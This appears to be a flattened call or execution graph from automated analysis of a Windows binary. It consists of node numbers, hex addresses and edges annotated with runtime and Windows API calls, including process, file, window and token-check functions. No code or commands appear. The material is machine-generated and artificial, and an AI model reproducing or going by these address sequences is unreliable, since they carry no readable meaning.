104616->104615 104617 c044de 104617->104615 104617->104616 104618->104601 104619->104579 104620->104579 104621->104582 104622->104597 104623->104609 104625 c04375 _memset 104624->104625 104757 c04182 104625->104757 104629 c04430 Shell_NotifyIconW 104632 c04422 104629->104632 104630 c04414 Shell_NotifyIconW 104630->104632 104631 c043fa 104631->104629 104631->104630 104633 c0407c 61 API calls 104632->104633 104634 c04429 104633->104634 104634->104570 104635->104607 104636->104570 104637->104592 104639 c04098 104638->104639 104640 c0416f Mailbox 104638->104640 104660 c07a16 104639->104660 104640->104617 104643 c040b3 104665 c07bcc 104643->104665 104644 c3d3c8 LoadStringW 104647 c3d3e2 104644->104647 104646 c040c8 104646->104647 104648 c040d9 104646->104648 104649 c07b2e 59 API calls 104647->104649 104650 c040e3 104648->104650 104651 c04174 104648->104651 104654 c3d3ec 104649->104654 104674 c07b2e 104650->104674 104683 c08047 104651->104683 104657 c040ed _memset _wcscpy 104654->104657 104687 c07cab 104654->104687 104656 c3d40e 104659 c07cab 59 API calls 104656->104659 104658 c04155 Shell_NotifyIconW 104657->104658 104658->104640 104659->104657 104694 c20db6 104660->104694 104662 c07a3b 104704 c08029 104662->104704 104666 c07c45 104665->104666 104667 c07bd8 __wsetenvp 104665->104667 104736 c07d2c 104666->104736 104669 c07c13 104667->104669 104670 c07bee 104667->104670 104671 c08029 59 API calls 104669->104671 104735 c07f27 59 API calls Mailbox 104670->104735 104673 c07bf6 _memmove 104671->104673 104673->104646 104675 c07b40 104674->104675 104676 c3ec6b 104674->104676 104744 c07a51 104675->104744 104750 c57bdb 59 API calls _memmove 104676->104750 104679 c07b4c 104679->104657 104680 c3ec75 104681 c08047 59 API calls 104680->104681 104682 c3ec7d Mailbox 104681->104682 104684 c08052 104683->104684 104685 c0805a 104683->104685 104751 c07f77 59 API calls 2 library calls 104684->104751 104685->104657 104688 c3ed4a 104687->104688 104689 c07cbf 104687->104689 104691 c08029 59 
API calls 104688->104691 104752 c07c50 104689->104752 104693 c3ed55 __wsetenvp _memmove 104691->104693 104692 c07cca 104692->104656 104695 c20dbe 104694->104695 104697 c20dd8 104695->104697 104699 c20ddc std::exception::exception 104695->104699 104707 c2571c 104695->104707 104724 c233a1 DecodePointer 104695->104724 104697->104662 104725 c2859b RaiseException 104699->104725 104701 c20e06 104726 c284d1 58 API calls _free 104701->104726 104703 c20e18 104703->104662 104705 c20db6 Mailbox 59 API calls 104704->104705 104706 c040a6 104705->104706 104706->104643 104706->104644 104708 c25797 104707->104708 104718 c25728 104707->104718 104733 c233a1 DecodePointer 104708->104733 104710 c2579d 104734 c28b28 58 API calls __getptd_noexit 104710->104734 104713 c2575b RtlAllocateHeap 104714 c2578f 104713->104714 104713->104718 104714->104695 104716 c25733 104716->104718 104727 c2a16b 58 API calls __NMSG_WRITE 104716->104727 104728 c2a1c8 58 API calls 7 library calls 104716->104728 104729 c2309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 104716->104729 104717 c25783 104731 c28b28 58 API calls __getptd_noexit 104717->104731 104718->104713 104718->104716 104718->104717 104722 c25781 104718->104722 104730 c233a1 DecodePointer 104718->104730 104732 c28b28 58 API calls __getptd_noexit 104722->104732 104724->104695 104725->104701 104726->104703 104727->104716 104728->104716 104730->104718 104731->104722 104732->104714 104733->104710 104734->104714 104735->104673 104737 c07d43 _memmove 104736->104737 104738 c07d3a 104736->104738 104737->104673 104738->104737 104740 c07e4f 104738->104740 104741 c07e62 104740->104741 104743 c07e5f _memmove 104740->104743 104742 c20db6 Mailbox 59 API calls 104741->104742 104742->104743 104743->104737 104745 c07a5f 104744->104745 104746 c07a85 _memmove 104744->104746 104745->104746 104747 c20db6 Mailbox 59 API calls 104745->104747 104746->104679 104748 c07ad4 104747->104748 104749 c20db6 Mailbox 59 API calls 104748->104749 
104749->104746 104750->104680 104751->104685 104753 c07c5f __wsetenvp 104752->104753 104754 c08029 59 API calls 104753->104754 104755 c07c70 _memmove 104753->104755 104756 c3ed07 _memmove 104754->104756 104755->104692 104758 c3d423 104757->104758 104759 c04196 104757->104759 104758->104759 104760 c3d42c DestroyIcon 104758->104760 104759->104631 104761 c62f94 62 API calls _W_store_winword 104759->104761 104760->104759 104761->104631 104762 c27c56 104763 c27c62 __wsopen_helper 104762->104763 104799 c29e08 GetStartupInfoW 104763->104799 104765 c27c67 104801 c28b7c GetProcessHeap 104765->104801 104767 c27cbf 104768 c27cca 104767->104768 104884 c27da6 58 API calls 3 library calls 104767->104884 104802 c29ae6 104768->104802 104771 c27cd0 104772 c27cdb __RTC_Initialize 104771->104772 104885 c27da6 58 API calls 3 library calls 104771->104885 104823 c2d5d2 104772->104823 104775 c27cea 104776 c27cf6 GetCommandLineW 104775->104776 104886 c27da6 58 API calls 3 library calls 104775->104886 104842 c34f23 GetEnvironmentStringsW 104776->104842 104779 c27cf5 104779->104776 104782 c27d10 104783 c27d1b 104782->104783 104887 c230b5 58 API calls 3 library calls 104782->104887 104852 c34d58 104783->104852 104786 c27d21 104787 c27d2c 104786->104787 104888 c230b5 58 API calls 3 library calls 104786->104888 104866 c230ef 104787->104866 104790 c27d34 104791 c27d3f __wwincmdln 104790->104791 104889 c230b5 58 API calls 3 library calls 104790->104889 104872 c047d0 104791->104872 104794 c27d53 104795 c27d62 104794->104795 104890 c23358 58 API calls _doexit 104794->104890 104891 c230e0 58 API calls _doexit 104795->104891 104798 c27d67 __wsopen_helper 104800 c29e1e 104799->104800 104800->104765 104801->104767 104892 c23187 36 API calls 2 library calls 104802->104892 104804 c29aeb 104893 c29d3c InitializeCriticalSectionAndSpinCount __alloc_osfhnd 104804->104893 104806 c29af0 104807 c29af4 104806->104807 104895 c29d8a TlsAlloc 104806->104895 104894 c29b5c 61 API calls 2 library calls 104807->104894 
104810 c29af9 104810->104771 104811 c29b06 104811->104807 104812 c29b11 104811->104812 104896 c287d5 104812->104896 104815 c29b53 104904 c29b5c 61 API calls 2 library calls 104815->104904 104818 c29b58 104818->104771 104819 c29b32 104819->104815 104820 c29b38 104819->104820 104903 c29a33 58 API calls 4 library calls 104820->104903 104822 c29b40 GetCurrentThreadId 104822->104771 104824 c2d5de __wsopen_helper 104823->104824 104916 c29c0b 104824->104916 104826 c2d5e5 104827 c287d5 __calloc_crt 58 API calls 104826->104827 104828 c2d5f6 104827->104828 104829 c2d661 GetStartupInfoW 104828->104829 104832 c2d601 __wsopen_helper @_EH4_CallFilterFunc@8 104828->104832 104830 c2d676 104829->104830 104831 c2d7a5 104829->104831 104830->104831 104835 c287d5 __calloc_crt 58 API calls 104830->104835 104838 c2d6c4 104830->104838 104833 c2d86d 104831->104833 104836 c2d7f2 GetStdHandle 104831->104836 104837 c2d805 GetFileType 104831->104837 104924 c29e2b InitializeCriticalSectionAndSpinCount 104831->104924 104832->104775 104925 c2d87d LeaveCriticalSection _doexit 104833->104925 104835->104830 104836->104831 104837->104831 104838->104831 104839 c2d6f8 GetFileType 104838->104839 104923 c29e2b InitializeCriticalSectionAndSpinCount 104838->104923 104839->104838 104843 c27d06 104842->104843 104844 c34f34 104842->104844 104848 c34b1b GetModuleFileNameW 104843->104848 104965 c2881d 58 API calls __malloc_crt 104844->104965 104846 c34f5a _memmove 104847 c34f70 FreeEnvironmentStringsW 104846->104847 104847->104843 104849 c34b4f _wparse_cmdline 104848->104849 104851 c34b8f _wparse_cmdline 104849->104851 104966 c2881d 58 API calls __malloc_crt 104849->104966 104851->104782 104853 c34d71 __wsetenvp 104852->104853 104857 c34d69 104852->104857 104854 c287d5 __calloc_crt 58 API calls 104853->104854 104862 c34d9a __wsetenvp 104854->104862 104855 c34df1 104856 c22d55 _free 58 API calls 104855->104856 104856->104857 104857->104786 104858 c287d5 __calloc_crt 58 API calls 104858->104862 104859 c34e16 
[Execution graph data, flattened by extraction: numbered graph nodes, the code addresses they represent (c22d55, c28dc6, c04713, ...), edge lists between nodes, and the API calls reached from each node. The rendered graph itself does not survive in the text. Recoverable information: the Windows API functions named in the graph are listed below; CRT-internal routines such as __beginthreadex, _free, __getptd_noexit, __lock, __wsopen_helper, __write_nolock and _memset also appear as node labels.]

Windows API functions named in the execution graph:

Process, module and error handling: IsDebuggerPresent, IsProcessorFeaturePresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, ExitProcess, GetLastError, GetModuleHandleW, GetModuleHandleExW, GetModuleFileNameW, GetProcAddress, LoadLibraryA, LoadLibraryExW, FreeLibrary, GetExitCodeProcess, WaitForSingleObject, CloseHandle, EncodePointer, DecodePointer, TlsSetValue

Synchronisation and memory: EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, HeapAlloc, RtlFreeHeap, Sleep

Token and security: AllocateAndInitializeSid, CheckTokenMembership, FreeSid

Files, console and paths: CreateFileW, GetFileType, WriteFile, WriteConsoleW, GetConsoleMode, GetConsoleCP, WideCharToMultiByte, GetCurrentDirectoryW, SetCurrentDirectoryW, GetFullPathNameW, GetOpenFileNameW, CreateStreamOnHGlobal

Resources: FindResourceExW, LoadResource, SizeofResource, LockResource, EnumResourceNamesW, LoadImageW, LoadCursorW, LoadIconW

Windows, messages and shell: RegisterClassExW, CreateWindowExW, ShowWindow, DestroyWindow, LockWindowUpdate, GetForegroundWindow, PeekMessageW, GetMessageW, TranslateMessage, DispatchMessageW, TranslateAcceleratorW, MessageBoxA, Shell_NotifyIconW, ShellExecuteW, GetSysColorBrush, IsThemeActive, SystemParametersInfoW, VariantClear

Timing: timeGetTime, GetSystemTimeAsFileTime, QueryPerformanceCounter, QueryPerformanceFrequency
106014->105840 106015->105847 106016->105846 106017->105858 106018->105847 106019->105846 106020->105852 106021->105847 106023 c2d4e3 106022->106023 106024 c2d4ce 106022->106024 106029 c2d508 106023->106029 106039 c28af4 58 API calls __getptd_noexit 106023->106039 106037 c28af4 58 API calls __getptd_noexit 106024->106037 106026 c2d4d3 106038 c28b28 58 API calls __getptd_noexit 106026->106038 106029->106001 106030 c2d512 106040 c28b28 58 API calls __getptd_noexit 106030->106040 106032 c2d4db 106032->106001 106033 c2d51a 106041 c28db6 9 API calls __beginthreadex 106033->106041 106035->106007 106036->106008 106037->106026 106038->106032 106039->106030 106040->106033 106041->106032 106104 c31940 106042->106104 106045 c04799 106110 c07d8c 106045->106110 106046 c0477c 106048 c07bcc 59 API calls 106046->106048 106049 c04788 106048->106049 106106 c07726 106049->106106 106052 c20791 106053 c2079e __write_nolock 106052->106053 106054 c2079f GetLongPathNameW 106053->106054 106055 c07bcc 59 API calls 106054->106055 106056 c072bd 106055->106056 106057 c0700b 106056->106057 106058 c07667 59 API calls 106057->106058 106059 c0701d 106058->106059 106060 c04750 60 API calls 106059->106060 106061 c07028 106060->106061 106062 c07033 106061->106062 106063 c3e885 106061->106063 106065 c03f74 59 API calls 106062->106065 106068 c3e89f 106063->106068 106120 c07908 61 API calls 106063->106120 106066 c0703f 106065->106066 106114 c034c2 106066->106114 106069 c07052 Mailbox 106069->105196 106071 c04ddd 136 API calls 106070->106071 106072 c0688f 106071->106072 106073 c3e031 106072->106073 106074 c04ddd 136 API calls 106072->106074 106075 c6955b 122 API calls 106073->106075 106076 c068a3 106074->106076 106077 c3e046 106075->106077 106076->106073 106078 c068ab 106076->106078 106079 c3e067 106077->106079 106080 c3e04a 106077->106080 106082 c3e052 106078->106082 106083 c068b7 106078->106083 106081 c20db6 Mailbox 59 API calls 106079->106081 106084 c04e4a 84 API calls 106080->106084 106088 c3e0ac 
Mailbox 106081->106088 106223 c642f8 90 API calls _wprintf 106082->106223 106121 c06a8c 106083->106121 106084->106082 106087 c3e060 106087->106079 106090 c3e260 106088->106090 106098 c3e271 106088->106098 106101 c07de1 59 API calls 106088->106101 106214 c5f73d 106088->106214 106217 c6737f 106088->106217 106224 c5f65e 61 API calls 2 library calls 106088->106224 106225 c0750f 59 API calls 2 library calls 106088->106225 106226 c0735d 59 API calls Mailbox 106088->106226 106091 c22d55 _free 58 API calls 106090->106091 106092 c3e268 106091->106092 106093 c04e4a 84 API calls 106092->106093 106093->106098 106097 c22d55 _free 58 API calls 106097->106098 106098->106097 106100 c04e4a 84 API calls 106098->106100 106227 c5f7a1 89 API calls 4 library calls 106098->106227 106100->106098 106101->106088 106105 c0475d GetFullPathNameW 106104->106105 106105->106045 106105->106046 106107 c07734 106106->106107 106108 c07d2c 59 API calls 106107->106108 106109 c04794 106108->106109 106109->106052 106111 c07da6 106110->106111 106113 c07d99 106110->106113 106112 c20db6 Mailbox 59 API calls 106111->106112 106112->106113 106113->106049 106115 c034d4 106114->106115 106119 c034f3 _memmove 106114->106119 106117 c20db6 Mailbox 59 API calls 106115->106117 106116 c20db6 Mailbox 59 API calls 106118 c0350a 106116->106118 106117->106119 106118->106069 106119->106116 106120->106063 106122 c06ab5 106121->106122 106123 c3e41e 106121->106123 106233 c057a6 60 API calls Mailbox 106122->106233 106300 c5f7a1 89 API calls 4 library calls 106123->106300 106126 c06ad7 106234 c057f6 67 API calls 106126->106234 106127 c3e431 106301 c5f7a1 89 API calls 4 library calls 106127->106301 106129 c06aec 106129->106127 106131 c06af4 106129->106131 106133 c07667 59 API calls 106131->106133 106132 c3e44d 106135 c06b61 106132->106135 106134 c06b00 106133->106134 106235 c20957 60 API calls __write_nolock 106134->106235 106137 c3e460 106135->106137 106138 c06b6f 106135->106138 106141 c05c6f CloseHandle 106137->106141 106142 
c07667 59 API calls 106138->106142 106139 c06b0c 106140 c07667 59 API calls 106139->106140 106143 c06b18 106140->106143 106144 c3e46c 106141->106144 106145 c06b78 106142->106145 106146 c04750 60 API calls 106143->106146 106147 c04ddd 136 API calls 106144->106147 106148 c07667 59 API calls 106145->106148 106149 c06b26 106146->106149 106150 c3e488 106147->106150 106151 c06b81 106148->106151 106236 c05850 ReadFile SetFilePointerEx 106149->106236 106153 c3e4b1 106150->106153 106157 c6955b 122 API calls 106150->106157 106238 c0459b 106151->106238 106302 c5f7a1 89 API calls 4 library calls 106153->106302 106156 c06b52 106237 c05aee SetFilePointerEx SetFilePointerEx 106156->106237 106161 c3e4a4 106157->106161 106158 c06b98 106162 c07b2e 59 API calls 106158->106162 106159 c3e4c8 106192 c06d0c Mailbox 106159->106192 106164 c3e4cd 106161->106164 106165 c3e4ac 106161->106165 106163 c06ba9 SetCurrentDirectoryW 106162->106163 106170 c06bbc Mailbox 106163->106170 106166 c04e4a 84 API calls 106164->106166 106167 c04e4a 84 API calls 106165->106167 106168 c3e4d2 106166->106168 106167->106153 106169 c20db6 Mailbox 59 API calls 106168->106169 106176 c3e506 106169->106176 106172 c20db6 Mailbox 59 API calls 106170->106172 106174 c06bcf 106172->106174 106173 c03bbb 106173->105050 106173->105059 106175 c0522e 59 API calls 106174->106175 106203 c06bda Mailbox __wsetenvp 106175->106203 106303 c0750f 59 API calls 2 library calls 106176->106303 106178 c06ce7 106296 c05c6f 106178->106296 106181 c3e740 106307 c672df 59 API calls Mailbox 106181->106307 106182 c06cf3 SetCurrentDirectoryW 106182->106192 106185 c3e762 106308 c7fbce 59 API calls 2 library calls 106185->106308 106188 c3e76f 106190 c22d55 _free 58 API calls 106188->106190 106189 c3e7d9 106311 c5f7a1 89 API calls 4 library calls 106189->106311 106190->106192 106228 c057d4 106192->106228 106195 c3e7f2 106195->106178 106197 c3e7d1 106310 c5f5f7 59 API calls 4 library calls 106197->106310 106200 c07de1 59 API calls 106200->106203 106201 
c5f73d 59 API calls 106205 c3e54f Mailbox 106201->106205 106203->106178 106203->106189 106203->106197 106203->106200 106289 c0586d 67 API calls _wcscpy 106203->106289 106290 c06f5d GetStringTypeW 106203->106290 106291 c06ecc 60 API calls __wcsnicmp 106203->106291 106292 c06faa GetStringTypeW __wsetenvp 106203->106292 106293 c2363d GetStringTypeW _iswctype 106203->106293 106294 c068dc 165 API calls 3 library calls 106203->106294 106295 c07213 59 API calls Mailbox 106203->106295 106204 c07de1 59 API calls 106204->106205 106205->106181 106205->106201 106205->106204 106207 c6737f 59 API calls 106205->106207 106209 c3e792 106205->106209 106304 c5f65e 61 API calls 2 library calls 106205->106304 106305 c0750f 59 API calls 2 library calls 106205->106305 106306 c07213 59 API calls Mailbox 106205->106306 106207->106205 106309 c5f7a1 89 API calls 4 library calls 106209->106309 106211 c3e7ab 106212 c22d55 _free 58 API calls 106211->106212 106213 c3e7be 106212->106213 106213->106192 106215 c20db6 Mailbox 59 API calls 106214->106215 106216 c5f76d _memmove 106215->106216 106216->106088 106218 c6738a 106217->106218 106219 c20db6 Mailbox 59 API calls 106218->106219 106220 c673a1 106219->106220 106221 c673b0 106220->106221 106222 c07de1 59 API calls 106220->106222 106221->106088 106222->106221 106223->106087 106224->106088 106225->106088 106226->106088 106227->106098 106229 c05c6f CloseHandle 106228->106229 106230 c057dc Mailbox 106229->106230 106231 c05c6f CloseHandle 106230->106231 106232 c057eb 106231->106232 106232->106173 106233->106126 106234->106129 106235->106139 106236->106156 106237->106135 106239 c07667 59 API calls 106238->106239 106240 c045b1 106239->106240 106241 c07667 59 API calls 106240->106241 106242 c045b9 106241->106242 106243 c07667 59 API calls 106242->106243 106244 c045c1 106243->106244 106245 c07667 59 API calls 106244->106245 106246 c045c9 106245->106246 106247 c3d4d2 106246->106247 106248 c045fd 106246->106248 106249 c08047 59 API calls 106247->106249 
106250 c0784b 59 API calls 106248->106250 106251 c3d4db 106249->106251 106252 c0460b 106250->106252 106253 c07d8c 59 API calls 106251->106253 106254 c07d2c 59 API calls 106252->106254 106256 c04640 106253->106256 106255 c04615 106254->106255 106255->106256 106257 c0784b 59 API calls 106255->106257 106259 c3d4fb 106256->106259 106260 c0465f 106256->106260 106275 c04680 106256->106275 106261 c04636 106257->106261 106263 c3d5cb 106259->106263 106273 c3d5b4 106259->106273 106282 c3d532 106259->106282 106265 c079f2 59 API calls 106260->106265 106264 c07d2c 59 API calls 106261->106264 106262 c04691 106267 c08047 59 API calls 106262->106267 106269 c046a3 106262->106269 106266 c07bcc 59 API calls 106263->106266 106264->106256 106270 c04669 106265->106270 106284 c3d588 106266->106284 106267->106269 106268 c046b3 106274 c046ba 106268->106274 106276 c08047 59 API calls 106268->106276 106269->106268 106272 c08047 59 API calls 106269->106272 106271 c0784b 59 API calls 106270->106271 106270->106275 106271->106275 106272->106268 106273->106263 106278 c3d59f 106273->106278 106277 c08047 59 API calls 106274->106277 106286 c046c1 Mailbox 106274->106286 106312 c0784b 106275->106312 106276->106274 106277->106286 106280 c07bcc 59 API calls 106278->106280 106279 c3d590 106281 c07bcc 59 API calls 106279->106281 106280->106284 106281->106284 106282->106279 106287 c3d57b 106282->106287 106283 c079f2 59 API calls 106283->106284 106284->106275 106284->106283 106325 c07924 59 API calls 2 library calls 106284->106325 106286->106158 106288 c07bcc 59 API calls 106287->106288 106288->106284 106289->106203 106290->106203 106291->106203 106292->106203 106293->106203 106294->106203 106295->106203 106297 c05c88 106296->106297 106298 c05c79 106296->106298 106297->106298 106299 c05c8d CloseHandle 106297->106299 106298->106182 106299->106298 106300->106127 106301->106132 106302->106159 106303->106205 106304->106205 106305->106205 106306->106205 106307->106185 106308->106188 106309->106211 106310->106189 
106311->106195 106313 c078b7 106312->106313 106314 c0785a 106312->106314 106315 c07d2c 59 API calls 106313->106315 106314->106313 106316 c07865 106314->106316 106322 c07888 _memmove 106315->106322 106317 c07880 106316->106317 106318 c3eb09 106316->106318 106326 c07f27 59 API calls Mailbox 106317->106326 106320 c08029 59 API calls 106318->106320 106321 c3eb13 106320->106321 106323 c20db6 Mailbox 59 API calls 106321->106323 106322->106262 106324 c3eb33 106323->106324 106325->106284 106326->106322 106328 c06d95 106327->106328 106334 c06ea9 106327->106334 106329 c20db6 Mailbox 59 API calls 106328->106329 106328->106334 106331 c06dbc 106329->106331 106330 c20db6 Mailbox 59 API calls 106332 c06e31 106330->106332 106331->106330 106332->106334 106340 c06240 106332->106340 106365 c0735d 59 API calls Mailbox 106332->106365 106366 c56553 59 API calls Mailbox 106332->106366 106367 c0750f 59 API calls 2 library calls 106332->106367 106334->105202 106338->105205 106339->105207 106341 c07a16 59 API calls 106340->106341 106359 c06265 106341->106359 106342 c0646a 106370 c0750f 59 API calls 2 library calls 106342->106370 106344 c06484 Mailbox 106344->106332 106347 c3dff6 106373 c5f8aa 91 API calls 4 library calls 106347->106373 106348 c07d8c 59 API calls 106348->106359 106349 c0750f 59 API calls 106349->106359 106353 c3e004 106374 c0750f 59 API calls 2 library calls 106353->106374 106355 c3e01a 106355->106344 106356 c06799 _memmove 106375 c5f8aa 91 API calls 4 library calls 106356->106375 106357 c3df92 106358 c08029 59 API calls 106357->106358 106360 c3df9d 106358->106360 106359->106342 106359->106347 106359->106348 106359->106349 106359->106356 106359->106357 106362 c07e4f 59 API calls 106359->106362 106368 c05f6c 60 API calls 106359->106368 106369 c05d41 59 API calls Mailbox 106359->106369 106371 c05e72 60 API calls 106359->106371 106372 c07924 59 API calls 2 library calls 106359->106372 106364 c20db6 Mailbox 59 API calls 106360->106364 106363 c0643b CharUpperBuffW 106362->106363 
106363->106359 106364->106356 106365->106332 106366->106332 106367->106332 106368->106359 106369->106359 106370->106344 106371->106359 106372->106359 106373->106353 106374->106355 106375->106344 106376->105221 106377->105220 106379 c0e6d5 106378->106379 106380 c43aa9 106379->106380 106383 c0e73f 106379->106383 106392 c0e799 106379->106392 106562 c09ea0 106380->106562 106382 c43abe 106396 c0e970 Mailbox 106382->106396 106586 c69e4a 89 API calls 4 library calls 106382->106586 106386 c07667 59 API calls 106383->106386 106383->106392 106384 c07667 59 API calls 106384->106392 106387 c43b04 106386->106387 106389 c22d40 __cinit 67 API calls 106387->106389 106388 c22d40 __cinit 67 API calls 106388->106392 106389->106392 106390 c43b26 106390->105298 106391 c084c0 69 API calls 106391->106396 106392->106384 106392->106388 106392->106390 106393 c0e95a 106392->106393 106392->106396 106393->106396 106587 c69e4a 89 API calls 4 library calls 106393->106587 106395 c09ea0 331 API calls 106395->106396 106396->106391 106396->106395 106397 c0f195 106396->106397 106398 c09c90 Mailbox 59 API calls 106396->106398 106401 c08d40 59 API calls 106396->106401 106407 c69e4a 89 API calls 106396->106407 106408 c0ea78 106396->106408 106561 c07f77 59 API calls 2 library calls 106396->106561 106588 c56e8f 59 API calls 106396->106588 106589 c7c5c3 331 API calls 106396->106589 106590 c7b53c 331 API calls Mailbox 106396->106590 106592 c793c6 331 API calls Mailbox 106396->106592 106591 c69e4a 89 API calls 4 library calls 106397->106591 106398->106396 106401->106396 106406 c43e25 106406->105298 106407->106396 106408->105298 106410 c0f650 106409->106410 106411 c0f4ba 106409->106411 106414 c07de1 59 API calls 106410->106414 106412 c0f4c6 106411->106412 106413 c4441e 106411->106413 106691 c0f290 331 API calls 2 library calls 106412->106691 106692 c7bc6b 331 API calls Mailbox 106413->106692 106420 c0f58c Mailbox 106414->106420 106417 c4442c 106421 c0f630 106417->106421 106693 c69e4a 89 API calls 4 library 
calls 106417->106693 106419 c0f4fd 106419->106417 106419->106420 106419->106421 106425 c04e4a 84 API calls 106420->106425 106599 c63c37 106420->106599 106602 c7445a 106420->106602 106611 c6cb7a 106420->106611 106421->105298 106422 c09c90 Mailbox 59 API calls 106423 c0f5e3 106422->106423 106423->106421 106423->106422 106425->106423 106429 c03212 106428->106429 106431 c031e0 106428->106431 106429->105298 106430 c03205 IsDialogMessageW 106430->106429 106430->106431 106431->106429 106431->106430 106432 c3cf32 GetClassLongW 106431->106432 106432->106430 106432->106431 106433->105298 106851 c08180 106434->106851 106436 c0fd3d 106438 c4472d 106436->106438 106483 c106f6 106436->106483 106856 c0f234 106436->106856 106870 c69e4a 89 API calls 4 library calls 106438->106870 106441 c44742 106442 c4488d 106442->106441 106447 c0fe4c 106442->106447 106876 c7a2d9 85 API calls Mailbox 106442->106876 106443 c10517 106453 c20db6 Mailbox 59 API calls 106443->106453 106444 c0fe3e 106444->106442 106444->106447 106874 c566ec 59 API calls 2 library calls 106444->106874 106446 c20db6 59 API calls Mailbox 106476 c0fdd3 106446->106476 106454 c448f9 106447->106454 106501 c44b53 106447->106501 106860 c0837c 106447->106860 106448 c447d7 106448->106441 106872 c69e4a 89 API calls 4 library calls 106448->106872 106450 c44848 106875 c560ef 59 API calls 2 library calls 106450->106875 106463 c10545 _memmove 106453->106463 106464 c44917 106454->106464 106878 c085c0 106454->106878 106456 c44755 106456->106448 106871 c0f6a3 331 API calls 106456->106871 106459 c0fea4 106468 c44ad6 106459->106468 106469 c0ff32 106459->106469 106508 c10179 Mailbox _memmove 106459->106508 106460 c4486b 106465 c09ea0 331 API calls 106460->106465 106461 c448b2 Mailbox 106461->106447 106877 c566ec 59 API calls 2 library calls 106461->106877 106470 c20db6 Mailbox 59 API calls 106463->106470 106467 c44928 106464->106467 106472 c085c0 59 API calls 106464->106472 106465->106442 106467->106508 106886 c560ab 59 API calls Mailbox 
106467->106886 106890 c69ae7 60 API calls 106468->106890 106473 c20db6 Mailbox 59 API calls 106469->106473 106512 c10106 _memmove 106470->106512 106472->106467 106476->106441 106476->106443 106476->106444 106476->106446 106476->106456 106476->106463 106478 c09ea0 331 API calls 106476->106478 106486 c4480c 106476->106486 106478->106476 106479 c44a4d 106480 c09ea0 331 API calls 106479->106480 106482 c44a87 106480->106482 106482->106441 106488 c084c0 69 API calls 106482->106488 106869 c69e4a 89 API calls 4 library calls 106483->106869 106873 c69e4a 89 API calls 4 library calls 106486->106873 106490 c44ab2 106488->106490 106889 c69e4a 89 API calls 4 library calls 106490->106889 106493 c09d3c 60 API calls 106493->106508 106496 c09c90 Mailbox 59 API calls 106496->106512 106497 c20db6 59 API calls Mailbox 106497->106508 106499 c10398 106499->105298 106501->106441 106891 c69e4a 89 API calls 4 library calls 106501->106891 106506 c44a1c 106509 c20db6 Mailbox 59 API calls 106506->106509 106508->106479 106508->106483 106508->106490 106508->106493 106508->106497 106508->106499 106508->106506 106867 c08740 68 API calls __cinit 106508->106867 106868 c08660 68 API calls 106508->106868 106887 c65937 68 API calls 106508->106887 106888 c089b3 69 API calls Mailbox 106508->106888 106509->106479 106512->106496 106512->106508 106513 c10162 106512->106513 106513->105298 106514->105228 106515->105233 106516->105298 106517->105235 106518->105235 106519->105235 106520->105298 106521->105298 106522->105298 106524 c09851 106523->106524 106525 c0984b 106523->106525 106526 c3f5d3 __i64tow 106524->106526 106527 c09899 106524->106527 106529 c09857 __itow 106524->106529 106533 c3f4da 106524->106533 106525->105298 106894 c23698 83 API calls 3 library calls 106527->106894 106531 c20db6 Mailbox 59 API calls 106529->106531 106532 c09871 106531->106532 106532->106525 106536 c07de1 59 API calls 106532->106536 106534 c3f552 Mailbox _wcscpy 106533->106534 106535 c20db6 Mailbox 59 API calls 106533->106535 
106895 c23698 83 API calls 3 library calls 106534->106895 106537 c3f51f 106535->106537 106536->106525 106538 c20db6 Mailbox 59 API calls 106537->106538 106539 c3f545 106538->106539 106539->106534 106540 c07de1 59 API calls 106539->106540 106540->106534 106541->105298 106542->105298 106544 c3eda1 106543->106544 106547 c082f2 106543->106547 106545 c3edb1 106544->106545 106896 c561a4 59 API calls 106544->106896 106548 c0831c 106547->106548 106549 c085c0 59 API calls 106547->106549 106553 c08339 Mailbox 106547->106553 106550 c08322 106548->106550 106551 c085c0 59 API calls 106548->106551 106549->106548 106552 c09c90 Mailbox 59 API calls 106550->106552 106550->106553 106551->106550 106552->106553 106553->105298 106554->105284 106555->105284 106556->105284 106557->105284 106558->105284 106559->105284 106560->105284 106561->106396 106563 c09ebf 106562->106563 106583 c09eed Mailbox 106562->106583 106564 c20db6 Mailbox 59 API calls 106563->106564 106564->106583 106565 c22d40 67 API calls __cinit 106565->106583 106566 c0b47a 106569 c40055 106566->106569 106584 c409e5 106566->106584 106567 c0b475 106568 c08047 59 API calls 106567->106568 106580 c0a057 106568->106580 106595 c69e4a 89 API calls 4 library calls 106569->106595 106573 c20db6 59 API calls Mailbox 106573->106583 106574 c40064 106574->106382 106577 c08047 59 API calls 106577->106583 106578 c07667 59 API calls 106578->106583 106579 c56e8f 59 API calls 106579->106583 106580->106382 106581 c409d6 106597 c69e4a 89 API calls 4 library calls 106581->106597 106583->106565 106583->106566 106583->106567 106583->106569 106583->106573 106583->106577 106583->106578 106583->106579 106583->106580 106583->106581 106585 c0a55a 106583->106585 106593 c0c8c0 331 API calls 2 library calls 106583->106593 106594 c0b900 60 API calls Mailbox 106583->106594 106598 c69e4a 89 API calls 4 library calls 106584->106598 106596 c69e4a 89 API calls 4 library calls 106585->106596 106586->106396 106587->106396 106588->106396 106589->106396 
106590->106396 106591->106406 106592->106396 106593->106583 106594->106583 106595->106574 106596->106580 106597->106584 106598->106580 106694 c6445a GetFileAttributesW 106599->106694 106603 c09837 84 API calls 106602->106603 106604 c74494 106603->106604 106605 c06240 94 API calls 106604->106605 106606 c744a4 106605->106606 106607 c09ea0 331 API calls 106606->106607 106609 c744c9 106606->106609 106607->106609 106610 c744cd 106609->106610 106698 c09a98 59 API calls Mailbox 106609->106698 106610->106423 106612 c07667 59 API calls 106611->106612 106613 c6cbaf 106612->106613 106614 c07667 59 API calls 106613->106614 106615 c6cbb8 106614->106615 106616 c6cbcc 106615->106616 106808 c09b3c 59 API calls 106615->106808 106618 c09837 84 API calls 106616->106618 106619 c6cbe9 106618->106619 106620 c6ccea 106619->106620 106621 c6cc0b 106619->106621 106632 c6cd1a Mailbox 106619->106632 106623 c04ddd 136 API calls 106620->106623 106622 c09837 84 API calls 106621->106622 106624 c6cc17 106622->106624 106625 c6ccfe 106623->106625 106626 c08047 59 API calls 106624->106626 106627 c6cd16 106625->106627 106630 c04ddd 136 API calls 106625->106630 106629 c6cc23 106626->106629 106628 c07667 59 API calls 106627->106628 106627->106632 106631 c6cd4b 106628->106631 106635 c6cc37 